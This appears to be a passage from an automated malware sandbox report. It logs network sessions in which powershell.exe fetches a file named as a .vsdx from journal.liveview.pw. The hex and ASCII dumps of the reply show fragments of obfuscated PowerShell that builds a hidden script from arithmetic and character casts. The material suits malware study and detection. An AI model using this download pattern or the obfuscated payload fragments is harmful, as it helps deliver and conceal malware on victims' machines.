1E39n2cx34A32t31E2cU34l31h35P2ce34r32l32w2cD34m32w34u2cH35y30U38D2ca34m34k32q2cZ34I31Z39L2cl34e35s39O2cA34x38s37f2cB34A39w32A2ce34o39j30i2cp34d31w35r2cH34H34O34c2ca34B31N35L2cQ34C38e32M2cM34V35e31z2cy34W39v33G2cu34R35s30H2cB34T39Y33l2cD34B32A33w2cM34i32D3
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 5a 33 36 47 32 63 4e 33 34 64 33 33 68 33 38 6b 32 63 59 33 34 6e 33 33 4b 33 39 7a 32 63 51 33 34 46 33 33 61 33 34 70 32 63 63 33 34 71 33 35 55 33 30 57 32 63 6e 33 34 63 33 33 6a 33 35 50 32 63 4b 33 34 78 33 33 54 33 37 74 32 63 62 33 34 58 33 33 4e 33 38 4d 32 63 6a 33 34 68 33 35 51 33 33 78 32 63 6a 33 34 51 33 33 49 33 34 4a 32 63 66 33 34 7a 33 33 42 33 31 46 32 63 55 33 34 6f 33 33 4b 33 35 4f 32 63 58 33 34 73 33 34 77 33 30 71 32 63 41 33 34 54 33 33 53 33 38 57 32 63 52 33 34 4b 33 34 76 33 39 50 32 63 4a 33 34 6e 33 35 4a 33 30 42 32 63 5a 33 34 78 33 33 50 33 35 69 32 63 70 33 34 63 33 34 47 33 39 4c 32 63 68 33 34 4c 33 33 72 33 32 6f 32 63 61 33 34 65 33 33 75 33 32 57 32 63 6e 33 34 46 33 35 57 33 32 6a 32 63 61 33 34 58 33 33 4c 33 35 Data Ascii: Z36G2cN34d33h38k2cY34n33K39z2cQ34F33a34p2cc34q35U30W2cn34c33j35P2cK34x33T37t2cb34X33N38M2cj34h35Q33x2cj34Q33I34J2cf34z33B31F2cU34o33K35O2cX34s34w30q2cA34T33S38W2cR34K34v39P2cJ34n35J30B2cZ34x33P35i2cp34c34G39L2ch34L33r32o2ca34e33u32W2cn34F35W32j2ca34X33L35
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 33 36 42 32 63 77 33 34 7a 33 33 45 33 33 72 32 63 42 33 34 51 33 34 6b 33 30 53 32 63 67 33 34 70 33 33 41 33 34 46 32 63 51 33 34 41 33 33 48 33 37 77 32 63 64 33 34 72 33 34 41 33 30 69 32 63 5a 33 34 74 33 33 6e 33 33 66 32 63 46 33 34 47 33 33 55 33 36 50 32 63 4e 33 34 6c 33 33 6c 33 33 51 32 63 6d 33 34 45 33 35 49 33 33 73 32 63 57 33 34 6e 33 35 69 33 30 65 32 63 62 33 34 5a 33 33 4f 33 33 41 32 63 45 33 34 41 33 34 58 33 30 51 32 63 65 33 34 52 33 33 42 33 31 78 32 63 77 33 34 45 33 35 62 33 32 44 32 63 4d 33 34 59 33 33 6d 33 38 75 32 63 76 33 34 55 33 33 46 33 35 76 32 63 44 33 34 6b 33 33 53 33 37 4c 32 63 72 33 34 4f 33 33 5a 33 35 71 32 63 4a 33 34 57 33 33 47 33 39 41 32 63 65 33 34 6d 33 33 61 33 38 45 32 63 6a 33 34 45 33 33 6c 33 37 77 Data Ascii: 36B2cw34z33E33r2cB34Q34k30S2cg34p33A34F2cQ34A33H37w2cd34r34A30i2cZ34t33n33f2cF34G33U36P2cN34l33l33Q2cm34E35I33s2cW34n35i30e2cb34Z33O33A2cE34A34X30Q2ce34R33B31x2cw34E35b32D2cM34Y33m38u2cv34U33F35v2cD34k33S37L2cr34O33Z35q2cJ34W33G39A2ce34m33a38E2cj34E33l37w
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 37 64 32 63 52 33 34 72 33 33 59 33 37 71 32 63 44 33 34 4e 33 33 61 33 35 4b 32 63 76 33 34 46 33 33 48 33 33 49 32 63 52 33 34 5a 33 33 47 33 35 52 32 63 55 33 34 54 33 35 45 33 33 48 32 63 73 33 34 57 33 35 71 33 30 6b 32 63 75 33 34 76 33 33 6c 33 37 65 32 63 78 33 34 6a 33 33 69 33 32 78 32 63 7a 33 34 5a 33 33 61 33 31 59 32 63 46 33 34 74 33 35 59 33 30 56 32 63 6a 33 34 42 33 33 64 33 39 77 32 63 6c 33 34 6b 33 33 75 33 36 4c 32 63 76 33 34 52 33 35 47 33 30 58 32 63 46 33 34 42 33 33 6b 33 36 76 32 63 42 33 34 6e 33 33 76 33 34 49 32 63 63 33 34 76 33 33 4d 33 31 4c 32 63 58 33 34 4a 33 35 49 33 32 72 32 63 79 33 34 69 33 33 4c 33 36 62 32 63 75 33 34 69 33 33 59 33 32 72 32 63 73 33 34 74 33 33 79 33 36 4b 32 63 41 33 34 61 33 33 6a 33 35 67 32 Data Ascii: 7d2cR34r33Y37q2cD34N33a35K2cv34F33H33I2cR34Z33G35R2cU34T35E33H2cs34W35q30k2cu34v33l37e2cx34j33i32x2cz34Z33a31Y2cF34t35Y30V2cj34B33d39w2cl34k33u36L2cv34R35G30X2cF34B33k36v2cB34n33v34I2cc34v33M31L2cX34J35I32r2cy34i33L36b2cu34i33Y32r2cs34t33y36K2cA34a33j35g2
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 4a 32 63 52 33 34 4b 33 33 66 33 35 70 32 63 55 33 34 73 33 33 43 33 38 6c 32 63 74 33 34 49 33 34 52 33 30 49 32 63 47 33 34 73 33 33 4a 33 39 44 32 63 73 33 34 4b 33 34 4e 33 39 59 32 63 74 33 34 6b 33 33 58 33 38 41 32 63 51 33 34 56 33 35 71 33 31 4c 32 63 70 33 34 77 33 35 5a 33 33 65 32 63 58 33 34 4f 33 34 6b 33 39 77 32 63 56 33 34 65 33 33 65 33 37 6f 32 63 7a 33 34 67 33 34 75 33 38 6b 32 63 54 33 34 45 33 35 42 33 32 4f 32 63 78 33 34 57 33 35 52 33 30 77 32 63 57 33 34 6f 33 33 51 33 37 68 32 63 6e 33 34 65 33 33 5a 33 39 7a 32 63 43 33 34 72 33 34 76 33 38 77 32 63 6a 33 34 6d 33 33 6c 33 39 72 32 63 49 33 34 4e 33 35 69 33 33 4e 32 63 67 33 34 59 33 34 5a 33 30 4e 32 63 70 33 34 6d 33 33 67 33 37 4c 32 63 54 33 34 62 33 33 4f 33 34 54 32 63 Data Ascii: J2cR34K33f35p2cU34s33C38l2ct34I34R30I2cG34s33J39D2cs34K34N39Y2ct34k33X38A2cQ34V35q31L2cp34w35Z33e2cX34O34k39w2cV34e33e37o2cz34g34u38k2cT34E35B32O2cx34W35R30w2cW34o33Q37h2cn34e33Z39z2cC34r34v38w2cj34m33l39r2cI34N35i33N2cg34Y34Z30N2cp34m33g37L2cT34b33O34T2c
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 32 63 51 33 34 6a 33 35 46 33 32 70 32 63 4f 33 34 79 33 35 79 33 33 54 32 63 47 33 34 75 33 33 67 33 32 4a 32 63 44 33 34 54 33 35 42 33 30 69 32 63 54 33 34 4f 33 33 64 33 31 74 32 63 79 33 34 79 33 35 71 33 33 56 32 63 4d 33 34 5a 33 33 48 33 38 71 32 63 46 33 34 70 33 33 66 33 35 69 32 63 6d 33 34 74 33 35 68 33 30 6a 32 63 68 33 34 4b 33 33 5a 33 37 74 32 63 41 33 34 50 33 33 6b 33 32 6c 32 63 77 33 34 6c 33 34 49 33 39 58 32 63 71 33 34 78 33 34 44 33 39 6e 32 63 4e 33 34 71 33 33 41 33 39 52 32 63 74 33 34 6b 33 33 64 33 33 6f 32 63 71 33 34 48 33 34 4e 33 39 52 32 63 50 33 34 79 33 33 57 33 39 4b 32 63 6d 33 34 53 33 33 42 33 31 49 32 63 70 33 34 6a 33 35 74 33 32 6a 32 63 4f 33 34 45 33 33 59 33 37 61 32 63 52 33 34 6b 33 34 7a 33 38 49 32 63 6c Data Ascii: 2cQ34j35F32p2cO34y35y33T2cG34u33g32J2cD34T35B30i2cT34O33d31t2cy34y35q33V2cM34Z33H38q2cF34p33f35i2cm34t35h30j2ch34K33Z37t2cA34P33k32l2cw34l34I39X2cq34x34D39n2cN34q33A39R2ct34k33d33o2cq34H34N39R2cP34y33W39K2cm34S33B31I2cp34j35t32j2cO34E33Y37a2cR34k34z38I2cl
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 63 6a 33 34 69 33 33 6d 33 32 63 32 63 42 33 34 4f 33 33 41 33 36 59 32 63 6f 33 34 46 33 34 4e 33 30 76 32 63 4b 33 34 57 33 34 46 33 39 6b 32 63 78 33 34 69 33 33 69 33 38 45 32 63 69 33 34 4f 33 34 46 33 39 44 32 63 53 33 34 42 33 35 67 33 33 76 32 63 6a 33 34 66 33 35 73 33 32 75 32 63 69 33 34 56 33 33 79 33 38 46 32 63 41 33 34 56 33 35 64 33 33 66 32 63 61 33 34 52 33 33 66 33 38 62 32 63 69 33 34 52 33 33 50 33 35 44 32 63 44 33 34 55 33 33 73 33 31 41 32 63 6b 33 34 53 33 33 45 33 32 56 32 63 63 33 34 6a 33 33 4a 33 33 7a 32 63 68 33 34 46 33 35 70 33 33 4a 32 63 4e 33 34 53 33 33 4d 33 36 6f 32 63 58 33 34 41 33 34 6b 33 38 63 32 63 46 33 34 44 33 34 64 33 39 52 32 63 69 33 34 65 33 33 56 33 33 41 32 63 6c 33 34 64 33 33 72 33 39 4f 32 63 6d 33 Data Ascii: cj34i33m32c2cB34O33A36Y2co34F34N30v2cK34W34F39k2cx34i33i38E2ci34O34F39D2cS34B35g33v2cj34f35s32u2ci34V33y38F2cA34V35d33f2ca34R33f38b2ci34R33P35D2cD34U33s31A2ck34S33E32V2cc34j33J33z2ch34F35p33J2cN34S33M36o2cX34A34k38c2cF34D34d39R2ci34e33V33A2cl34d33r39O2cm3
2024-12-21 20:04:40 UTC	1369	IN	Data Raw: 62 33 34 74 33 33 6e 33 32 78 32 63 67 33 34 59 33 34 5a 33 39 55 32 63 72 33 34 75 33 35 63 33 31 56 32 63 47 33 34 79 33 33 64 33 34 54 32 63 51 33 34 64 33 33 52 33 36 42 32 63 4b 33 34 78 33 33 46 33 33 66 32 63 51 33 34 4e 33 34 61 33 30 6f 32 63 63 33 34 79 33 33 41 33 32 75 32 63 48 33 34 69 33 34 51 33 39 67 32 63 44 33 34 55 33 33 4c 33 38 73 32 63 56 33 34 66 33 33 77 33 31 42 32 63 67 33 34 42 33 33 67 33 34 47 32 63 4f 33 34 70 33 33 55 33 34 76 32 63 66 33 34 72 33 35 4b 33 31 64 32 63 6f 33 34 48 33 33 67 33 35 54 32 63 78 33 34 6b 33 33 73 33 37 74 32 63 74 33 34 69 33 33 4e 33 32 59 32 63 68 33 34 77 33 33 51 33 39 76 32 63 52 33 34 5a 33 34 67 33 39 66 32 63 42 33 34 44 33 33 7a 33 38 50 32 63 68 33 34 54 33 35 5a 33 33 6e 32 63 64 33 34 Data Ascii: b34t33n32x2cg34Y34Z39U2cr34u35c31V2cG34y33d34T2cQ34d33R36B2cK34x33F33f2cQ34N34a30o2cc34y33A32u2cH34i34Q39g2cD34U33L38s2cV34f33w31B2cg34B33g34G2cO34p33U34v2cf34r35K31d2co34H33g35T2cx34k33s37t2ct34i33N32Y2ch34w33Q39v2cR34Z34g39f2cB34D33z38P2ch34T35Z33n2cd34

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49755	104.21.37.173	443	8336	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:04:47 UTC	80	OUT	GET /singl6.vsdx HTTP/1.1 Host: journal.liveview.pw Connection: Keep-Alive
2024-12-21 20:04:47 UTC	981	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 20:04:47 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 10676100 Connection: close X-Powered-By: Express ETag: W/"a2e784-rvlBQ2QbU230PMdhjioter3dS9Y" Set-Cookie: connect.sid=s%3ArFOouH3pTqmd6DVT_m-Oi-d75u0JyhK5.YvQonvgm1bg4RzyvYO8Lkk0uMOufno9Oj4D8hikE1tc; Path=/; HttpOnly cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDvfbJJG5OYQoPrzsDZNjeXlAAtnBYdUbFbXaSakLV6L%2B24nJGJLPNYh6iH7MjStJhjXjBF0gJLsKqvHZR046ww1WFwD2d7Hn4i8CPfGnarJ2hwlLvYm38GnrmpLiFP0GlIpTSQP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5a7bb53b86d9bd-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129372&min_rtt=128930&rtt_var=27873&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=694&delivery_rate=29393&cwnd=252&unsent_bytes=0&cid=d9b746cc03dfef88&ts=636&x=0"
2024-12-21 20:04:47 UTC	388	IN	Data Raw: 24 4f 53 39 4c 76 4d 71 72 52 37 30 59 58 6a 42 57 42 73 7a 53 58 7a 56 35 6f 4d 6e 42 33 6b 58 69 67 31 74 53 4f 6b 4c 73 71 65 77 46 35 62 64 4f 4a 35 6b 6d 59 54 53 62 34 76 79 49 4e 42 4a 50 42 6f 38 43 53 50 57 42 48 50 54 69 31 36 53 7a 42 30 65 4f 4c 58 44 47 43 6b 61 4c 55 30 61 45 55 32 55 79 51 42 73 51 7a 36 76 6a 61 4e 4c 75 66 30 53 6e 57 4d 6c 70 32 73 52 7a 37 39 36 42 48 55 4f 65 31 77 34 66 30 42 42 78 33 4a 6b 41 6f 43 67 70 6b 73 67 63 30 74 4f 61 77 32 33 46 69 35 58 54 4a 38 36 39 39 4d 64 4c 66 77 70 39 54 32 6c 42 67 5a 5a 6a 74 4d 65 73 6f 56 4f 36 43 6e 4a 73 73 75 58 42 6b 6c 43 61 55 36 79 45 70 49 48 47 6a 4e 57 7a 45 52 4f 78 68 42 38 6e 44 55 4a 42 44 73 36 44 64 37 66 35 6e 67 43 65 51 37 61 42 49 70 46 6a 4a 6d 6f 63 70 66 Data Ascii: $OS9LvMqrR70YXjBWBszSXzV5oMnB3kXig1tSOkLsqewF5bdOJ5kmYTSb4vyINBJPBo8CSPWBHPTi16SzB0eOLXDGCkaLU0aEU2UyQBsQz6vjaNLuf0SnWMlp2sRz796BHUOe1w4f0BBx3JkAoCgpksgc0tOaw23Fi5XTJ8699MdLfwp9T2lBgZZjtMesoVO6CnJssuXBklCaU6yEpIHGjNWzEROxhB8nDUJBDs6Dd7f5ngCeQ7aBIpFjJmocpf
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 50 59 56 4b 38 76 47 4f 4d 46 62 47 75 78 63 38 54 66 4a 61 64 68 58 61 65 71 58 31 6d 53 56 33 30 32 55 46 44 36 4b 30 79 68 45 58 42 42 52 51 34 6b 50 6a 53 6f 70 57 53 69 6b 6c 75 36 6b 6f 6b 52 6c 74 51 68 51 50 61 74 73 73 53 6b 76 52 4b 52 6d 47 61 68 73 36 4f 4d 61 6b 6f 66 79 46 49 42 52 36 39 6e 59 4c 4f 38 62 33 4f 46 50 35 50 42 52 6e 68 48 36 42 54 48 47 37 52 73 64 66 30 43 69 39 51 65 64 52 47 78 37 79 6b 59 62 79 44 69 72 72 54 6f 74 52 41 4a 6e 54 43 4f 6e 49 38 68 59 6d 45 48 52 59 6e 55 4b 74 33 69 75 58 5a 63 76 36 75 43 54 6e 6c 79 65 66 4a 61 4b 58 57 42 54 73 30 6d 33 6e 75 6f 45 49 4b 32 38 66 45 76 79 62 47 42 51 4f 69 6b 73 73 43 39 6e 55 70 6d 31 57 67 38 45 46 52 6c 30 35 6c 68 44 69 77 41 48 51 7a 54 61 4b 72 4f 48 4c 54 6a 67 Data Ascii: PYVK8vGOMFbGuxc8TfJadhXaeqX1mSV302UFD6K0yhEXBBRQ4kPjSopWSiklu6kokRltQhQPatssSkvRKRmGahs6OMakofyFIBR69nYLO8b3OFP5PBRnhH6BTHG7Rsdf0Ci9QedRGx7ykYbyDirrTotRAJnTCOnI8hYmEHRYnUKt3iuXZcv6uCTnlyefJaKXWBTs0m3nuoEIK28fEvybGBQOikssC9nUpm1Wg8EFRl05lhDiwAHQzTaKrOHLTjg
2024-12-21 20:04:47 UTC	456	IN	Data Raw: 62 64 4f 4a 35 6b 6d 59 54 53 62 34 76 79 49 4e 42 4a 50 42 6f 38 43 53 50 57 42 48 50 54 69 31 36 53 7a 42 30 65 4f 4c 58 44 47 43 6b 61 4c 55 30 61 45 55 32 55 79 51 42 73 51 7a 36 76 6a 61 4e 4c 75 66 30 53 6e 57 4d 6c 70 32 73 52 7a 37 39 36 42 48 55 4f 65 31 77 34 66 30 42 42 78 33 4a 6b 41 6f 43 67 70 6b 73 67 63 30 74 4f 61 77 32 33 46 69 35 58 54 4a 38 36 39 39 4d 64 4c 66 77 70 39 54 32 6c 42 67 5a 5a 6a 74 4d 65 73 6f 56 4f 36 43 6e 4a 73 73 75 58 42 6b 6c 43 61 55 36 79 45 70 49 48 47 6a 4e 57 7a 45 52 4f 78 68 42 38 6e 44 55 4a 42 44 73 36 44 64 37 66 35 6e 67 43 65 51 37 61 42 49 70 46 6a 4a 6d 6f 63 70 66 38 30 4c 4d 44 58 6c 4d 77 6b 4c 6c 72 30 41 58 51 4f 49 35 58 79 6b 32 44 39 42 48 64 61 73 56 61 73 35 30 75 61 50 52 30 38 4a 6d 38 41 Data Ascii: bdOJ5kmYTSb4vyINBJPBo8CSPWBHPTi16SzB0eOLXDGCkaLU0aEU2UyQBsQz6vjaNLuf0SnWMlp2sRz796BHUOe1w4f0BBx3JkAoCgpksgc0tOaw23Fi5XTJ8699MdLfwp9T2lBgZZjtMesoVO6CnJssuXBklCaU6yEpIHGjNWzEROxhB8nDUJBDs6Dd7f5ngCeQ7aBIpFjJmocpf80LMDXlMwkLlr0AXQOI5Xyk2D9BHdasVas50uaPR08Jm8A
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 65 64 52 47 78 37 79 6b 59 62 79 44 69 72 72 54 6f 74 52 41 4a 6e 54 43 4f 6e 49 38 68 59 6d 45 48 52 59 6e 55 4b 74 33 69 75 58 5a 63 76 36 75 43 54 6e 6c 79 65 66 4a 61 4b 58 57 42 54 73 30 6d 33 6e 75 6f 45 49 4b 32 38 66 45 76 79 62 47 42 51 4f 69 6b 73 73 43 39 6e 55 70 6d 31 57 67 38 45 46 52 6c 30 35 6c 68 44 69 77 41 48 51 7a 54 61 4b 72 4f 48 4c 54 6a 67 51 64 39 5a 6b 62 62 54 49 33 4c 35 44 46 72 6a 6b 67 45 72 4a 58 51 36 33 32 57 51 76 64 65 71 44 68 38 52 75 68 4c 58 58 48 46 7a 67 4b 54 45 69 4b 55 49 32 72 54 4e 70 4f 46 77 39 66 56 71 48 6f 54 49 71 34 37 43 54 6e 30 49 57 58 72 4b 4e 49 6c 32 64 37 70 35 57 6e 6b 64 43 67 52 63 4f 56 66 58 39 46 51 73 58 34 6a 6a 6f 32 76 6e 36 55 62 59 66 64 35 57 70 70 35 74 49 4d 65 74 37 4a 76 4a 50 Data Ascii: edRGx7ykYbyDirrTotRAJnTCOnI8hYmEHRYnUKt3iuXZcv6uCTnlyefJaKXWBTs0m3nuoEIK28fEvybGBQOikssC9nUpm1Wg8EFRl05lhDiwAHQzTaKrOHLTjgQd9ZkbbTI3L5DFrjkgErJXQ632WQvdeqDh8RuhLXXHFzgKTEiKUI2rTNpOFw9fVqHoTIq47CTn0IWXrKNIl2d7p5WnkdCgRcOVfX9FQsX4jjo2vn6UbYfd5Wpp5tIMet7JvJP
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 59 57 65 20 3d 20 35 39 37 0d 0a 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 20 3d 20 24 51 55 56 4d 4c 78 6b 49 68 43 74 0d 0a 24 55 44 6d 63 77 20 3d 20 24 4c 54 48 6e 53 4b 52 45 75 58 42 0d 0a 24 45 66 43 6f 51 58 6a 77 53 64 61 20 3d 20 28 28 28 32 30 2b 32 33 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 31 32 2d 28 24 55 44 6d 63 77 2d 31 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 32 38 2d 39 29 29 29 2d 24 55 73 66 4b 6f 71 50 6a 54 4e 2d 34 36 2b 34 33 29 29 29 0d 0a 73 77 69 74 63 68 28 28 33 2b 31 38 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 31 36 2d 24 71 63 48 58 65 54 77 54 70 Data Ascii: YWe = 597$ZOCmjUjDPSf = $QUVMLxkIhCt$UDmcw = $LTHnSKREuXB$EfCoQXjwSda = (((20+23-($URdkRwJGLmvSh-12-($UDmcw-1-($URdkRwJGLmvSh-28-9)))-$UsfKoqPjTN-46+43)))switch((3+18+$lBCTZLcswvrSw)-(34-26-$ZOCmjUjDPSf)-(37-40-4)){(((($EfCoQXjwSda-16-$qcHXeTwTp
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 4b 77 71 6c 4e 6b 76 55 20 3d 20 34 39 32 0d 0a 24 44 4b 45 69 58 6c 55 79 4b 67 50 20 3d 20 24 4f 72 4a 6d 70 45 4e 0d 0a 24 73 63 64 76 4e 52 72 20 3d 20 24 44 74 57 65 68 67 6f 77 49 6e 0d 0a 24 58 72 68 4e 7a 20 3d 20 24 4a 72 4f 67 46 75 76 49 44 0d 0a 24 55 48 58 46 59 20 3d 20 35 35 39 0d 0a 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 20 3d 20 24 4f 72 4a 6d 70 45 4e 0d 0a 24 49 79 62 63 44 68 47 6d 6a 54 20 3d 20 36 0d 0a 24 4e 69 61 73 49 65 20 3d 20 28 28 28 28 28 31 39 2a 32 33 2a 33 35 29 29 2d 31 36 2d 32 2b 28 33 38 2b 32 33 2b 35 29 29 2d 28 31 34 38 37 39 29 29 29 0d 0a 24 4e 4d 45 47 52 6f 20 3d 20 28 28 28 28 28 33 31 2d 37 2a 31 32 29 2a 34 31 2a 31 30 2d 28 34 2d 34 37 2a 33 31 2a 34 37 2a 31 32 2a 32 32 29 29 2d 28 33 34 2a 33 35 2a Data Ascii: KwqlNkvU = 492$DKEiXlUyKgP = $OrJmpEN$scdvNRr = $DtWehgowIn$XrhNz = $JrOgFuvID$UHXFY = 559$JYEsaFQDfzWRKC = $OrJmpEN$IybcDhGmjT = 6$NiasIe = (((((192335))-16-2+(38+23+5))-(14879)))$NMEGRo = (((((31-712)4110-(4-4731471222))-(3435*
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 53 59 2b 32 35 2d 28 39 2b 32 35 2d 35 29 2d 28 37 31 39 29 29 0d 0a 24 63 45 6a 54 6c 74 49 4d 58 69 41 43 20 3d 20 28 28 28 28 24 65 73 4b 77 71 6c 4e 6b 76 55 2d 31 2d 24 72 53 42 71 6e 53 6c 6b 4f 66 29 2d 28 24 4f 65 46 78 59 57 65 2d 34 39 2b 32 31 2b 32 31 2d 32 32 2b 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 2d 28 28 24 51 55 56 4d 4c 78 6b 49 68 43 74 2d 34 32 2d 31 36 29 29 29 29 29 2b 28 35 39 37 29 29 0d 0a 24 50 6c 4c 79 6b 4a 77 78 43 44 5a 20 3d 20 28 28 28 28 31 2b 34 39 2b 32 39 29 29 29 2b 28 34 33 2d 31 32 2d 34 38 2b 34 35 2d 34 2d 28 24 6b 57 67 68 4f 74 75 5a 78 6e 53 65 68 51 2b 32 30 2d 34 38 29 29 2d 28 32 32 29 29 0d 0a 24 4f 65 52 75 67 76 6b 41 4d 45 20 3d 20 28 28 28 28 34 38 2b 33 34 2b 24 66 6f 68 75 6a 7a 6f 42 4d 57 29 Data Ascii: SY+25-(9+25-5)-(719))$cEjTltIMXiAC = (((($esKwqlNkvU-1-$rSBqnSlkOf)-($OeFxYWe-49+21+21-22+$JYEsaFQDfzWRKC-(($QUVMLxkIhCt-42-16)))))+(597))$PlLykJwxCDZ = ((((1+49+29)))+(43-12-48+45-4-($kWghOtuZxnSehQ+20-48))-(22))$OeRugvkAME = ((((48+34+$fohujzoBMW)
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 63 4b 45 68 59 20 3d 20 28 28 28 28 32 34 2d 31 36 2b 24 4e 4d 45 47 52 6f 29 29 29 2b 24 45 66 43 6f 51 58 6a 77 53 64 61 2b 34 34 2d 32 35 2b 28 28 34 38 2d 32 34 2b 28 24 7a 79 51 67 67 2d 33 39 2b 32 37 29 29 29 2b 31 33 2b 39 2b 31 31 2b 28 31 35 39 33 29 29 0d 0a 24 51 5a 53 64 66 6f 45 4a 57 63 74 20 3d 20 28 28 28 28 31 38 2d 31 30 2b 32 29 2b 24 71 63 48 58 65 54 77 54 70 78 65 63 46 2b 36 2b 31 31 29 29 2d 24 61 4a 56 63 75 74 52 68 72 50 45 2d 34 35 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 2d 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 32 37 2d 24 55 44 6d 63 77 2b 31 39 2d 32 2d 31 33 2d 28 32 35 30 38 29 29 0d 0a 24 57 4e 64 69 52 6c 52 41 20 3d 20 28 28 28 28 34 30 2b 32 38 2b 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 29 29 2b 24 79 53 6f Data Ascii: cKEhY = ((((24-16+$NMEGRo)))+$EfCoQXjwSda+44-25+((48-24+($zyQgg-39+27)))+13+9+11+(1593))$QZSdfoEJWct = ((((18-10+2)+$qcHXeTwTpxecF+6+11))-$aJVcutRhrPE-45+$lBCTZLcswvrSw-$EfCoQXjwSda-27-$UDmcw+19-2-13-(2508))$WNdiRlRA = ((((40+28+$JYEsaFQDfzWRKC))+$ySo
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 61 72 5d 5b 69 6e 74 5d 24 67 76 70 6f 46 78 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 51 66 74 6a 6b 47 50 76 67 71 4b 5a 45 79 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 63 45 6a 54 6c 74 49 4d 58 69 41 43 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 50 6c 4c 79 6b 4a 77 78 43 44 5a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4f 65 52 75 67 76 6b 41 4d 45 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 56 6a 58 61 63 6b 7a 54 42 76 70 52 65 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6c 63 7a 45 54 76 42 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 67 4f 78 51 4b 77 47 4e 55 4c 4d 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 50 6f 6b 78 44 65 53 52 42 5a 66 73 4a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 62 75 5a 4d 63 6a 61 20 2b 20 5b Data Ascii: ar][int]$gvpoFx + [char][int]$QftjkGPvgqKZEy + [char][int]$cEjTltIMXiAC + [char][int]$PlLykJwxCDZ + [char][int]$OeRugvkAME + [char][int]$SVjXackzTBvpRe + [char][int]$lczETvB + [char][int]$gOxQKwGNULM + [char][int]$KPokxDeSRBZfsJ + [char][int]$SbuZMcja + [
2024-12-21 20:04:47 UTC	1369	IN	Data Raw: 77 4a 47 4c 6d 76 53 68 2d 31 32 2d 28 24 55 44 6d 63 77 2d 31 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 32 38 2d 39 29 29 29 2d 24 55 73 66 4b 6f 71 50 6a 54 4e 2d 34 36 2b 34 33 29 29 29 0d 0a 73 77 69 74 63 68 28 28 33 2b 31 38 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 31 36 2d 24 71 63 48 58 65 54 77 54 70 78 65 63 46 2d 34 2d 34 34 2d 24 66 6f 68 75 6a 7a 6f 42 4d 57 29 29 2b 28 28 24 51 55 56 4d 4c 78 6b 49 68 43 74 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 76 48 58 71 55 59 79 63 20 3d 20 36 31 30 0d 0a 24 69 41 6e 54 61 77 20 3d 20 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 Data Ascii: wJGLmvSh-12-($UDmcw-1-($URdkRwJGLmvSh-28-9)))-$UsfKoqPjTN-46+43)))switch((3+18+$lBCTZLcswvrSw)-(34-26-$ZOCmjUjDPSf)-(37-40-4)){(((($EfCoQXjwSda-16-$qcHXeTwTpxecF-4-44-$fohujzoBMW))+(($QUVMLxkIhCt-39-23)))) {$vHXqUYyc = 610$iAnTaw = $lBCTZLcswvrS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49756	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
